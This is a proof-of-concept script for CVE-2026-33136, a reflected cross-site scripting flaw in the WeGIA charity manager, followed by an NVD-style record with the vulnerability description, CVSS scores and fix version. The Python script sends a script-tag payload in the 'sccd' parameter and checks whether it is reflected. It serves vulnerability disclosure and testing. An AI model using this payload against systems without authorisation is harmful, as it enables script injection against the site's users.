CVE-2026-33136

# PoC for CVE-2026-33136 # Target: WeGIA <= 3.6.6 import requests target_url = "http://target.com/html/memorando/listar_memorandos_ativos.php" # The 'msg' parameter must be 'success' to reach the vulnerable code path # The 'sccd' parameter is the injection point params = { "msg": "success", "sccd": "<script>alert('CVE-2026-33136_XSS');</script>" } response = requests.get(target_url, params=params) if "alert('CVE-2026-33136_XSS')" in response.text: print("Vulnerable: XSS payload reflected in response.") else: print("Not vulnerable or payload changed.")

{"cve": {"id": "CVE-2026-33136", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:03.527", "lastModified": "2026-03-20T19:23:40.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Versions 3.6.6 and below have a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint. An attacker can inject arbitrary JavaScript or HTML tags into the sccd GET parameter, which is then directly echoed into the HTML response without any sanitization or encoding. The script /html/memorando/listar_memorandos_ativos.php handles dynamic success messages to users using query string parameters. Similar to other endpoints in the Memorando module, it checks if $_GET['msg'] equals 'success'. If this condition is met, it directly concatenates and reflects $_GET['sccd'] into an HTML alert <div>. This issue is resolved in version 3.6.7."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Versiones 3.6.6 e inferiores tienen una vulnerabilidad de cross-site scripting (XSS) reflejado en el endpoint listar_memorandos_ativos.php. Un atacante puede inyectar JavaScript o etiquetas HTML arbitrarias en el parámetro GET sccd, que luego se refleja directamente en la respuesta HTML sin ninguna sanitización o codificación. El script /html/memorando/listar_memorandos_ativos.php maneja mensajes de éxito dinámicos para los usuarios utilizando parámetros de cadena de consulta. Similar a otros endpoints en el módulo Memorando, verifica si $_GET['msg'] es igual a 'success'. Si se cumple esta condición, concatena y refleja directamente $_GET['sccd'] en un de alerta HTML. Este problema se resuelve en la versión 3.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.7", "matchCriteriaId": "2D7D6601-2E0C-45E4-BD44-829D2FD7F97C"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xjqp-5q3h-2cxh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}